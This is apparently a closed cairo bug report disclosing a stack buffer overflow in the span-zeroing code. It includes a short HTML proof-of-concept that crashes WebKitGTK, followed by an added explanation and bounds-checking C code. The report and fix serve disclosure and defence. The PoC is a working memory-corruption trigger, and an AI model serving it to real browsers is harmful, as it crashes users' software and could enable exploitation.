
Closed
Issue created Oct 08, 2018 by dwfault@dwfault

Out of bound memset in libcairo result in stack buffer overflow

Hello, I found a bug that could result in a stack buffer overflow in libcairo. This bug was found in the process of fuzzing WebKitGTK. This bug was originally found in cairo-1.14.8, but the recent git commit 06ef6db9 could also make this one reproducible.

```html
<style>
  #da {
    border-left: solid 1em;
    border-top-left-radius: 27vmin;
    border-bottom-style: double;
  }
  #ta {
    font-family: 'Calibri';
  }
  :root {
    -webkit-border-end: solid 1px;
    column-width: 1px
  }
</style>
<script>
  function js() {
    ta.cols = 38;
  }
</script>
<body onload=js()>
  <dialog id="da"><textarea id="ta"/></dialog>
</body>
```

cairo-rectangular-scan-converter.c:

Function generate() calls render_rows(), and _cairo_image_spans_and_zero() is actually called. With the provided PoC, there are 5 calls before the process crashes, the last of which overflows the buffer and overwrites the stack canary. (In some untrimmed PoCs, the content also overwrote the return address on the stack.)

_cairo_image_spans_and_zero() writes zeros to the stack, but the root cause of the crash could reside in the logic of function generate(). Thus, besides DoS, unspecified effects could also exist. This bug was found by ADLab of Venustech.

Edited Nov 05, 2018 by dwfault
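The report above describes the failure class in general terms: a span-zeroing routine memsets into a fixed-size row buffer on the stack using span coordinates it did not validate, so a span whose end lies past the row width runs over the canary and return address. The following is an added illustration written for this page, not cairo's code and not the reporter's, of the check a defender wants in front of such a memset: every span is validated against the row width before any byte is written, and a single out-of-range span causes the whole batch to be refused. The `span_t` type, `ROW_WIDTH`, `first_invalid_span()`, `zero_spans_checked()` and `demo()` are all hypothetical names chosen here, and the spans in `demo()` are constructed sample input.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical span type for this illustration; not cairo's own definition. */
typedef struct {
    int x0; /* first pixel column to zero (inclusive) */
    int x1; /* one past the last pixel column to zero (exclusive) */
} span_t;

/* Width of the stack row buffer used by the demonstration (constructed value). */
#define ROW_WIDTH 64

/* Return the index of the first span that does not fit in [0, width),
 * or -1 if every span is in range. Checking all spans up front means a
 * bad span is caught before any memset has touched the buffer. */
int first_invalid_span(const span_t *spans, size_t n, int width)
{
    for (size_t i = 0; i < n; i++) {
        if (spans[i].x0 < 0 || spans[i].x1 > width || spans[i].x0 > spans[i].x1)
            return (int)i;
    }
    return -1;
}

/* Zero the given spans inside a row buffer of `width` bytes.
 * Returns the number of bytes zeroed, or -1 if any span was rejected,
 * in which case the buffer is left untouched. */
long zero_spans_checked(uint8_t *row, int width, const span_t *spans, size_t n)
{
    if (first_invalid_span(spans, n, width) != -1)
        return -1;

    long total = 0;
    for (size_t i = 0; i < n; i++) {
        size_t len = (size_t)(spans[i].x1 - spans[i].x0);
        memset(row + spans[i].x0, 0, len); /* safe: bounds proven above */
        total += (long)len;
    }
    return total;
}

/* Self-check on constructed input. Returns 0 on success, a nonzero step
 * number identifying the first failed expectation otherwise. */
int demo(void)
{
    uint8_t row[ROW_WIDTH];
    memset(row, 0xff, sizeof row);

    /* Two spans that fit the row. */
    span_t good[] = { { 0, 8 }, { 16, 32 } };
    /* Second span ends at column 72 > ROW_WIDTH: would write 8 bytes past the buffer. */
    span_t bad[] = { { 0, 8 }, { 60, 72 } };

    if (zero_spans_checked(row, ROW_WIDTH, good, 2) != 24)
        return 1;
    if (row[0] != 0 || row[8] != 0xff || row[31] != 0 || row[32] != 0xff)
        return 2;

    /* The batch containing the overlong span is refused as a whole... */
    if (zero_spans_checked(row, ROW_WIDTH, bad, 2) != -1)
        return 3;
    /* ...and nothing was written, not even the valid first span. */
    if (row[60] != 0xff || row[0] != 0)
        return 4;

    return 0;
}

int main(void)
{
    return demo();
}
```

The point of validating the whole span list before the first memset, rather than clamping each span as it is written, is that a caller handed malformed geometry gets a clear error instead of a partially zeroed row, which is the behaviour a scan converter fed by fuzzed input should fall back to.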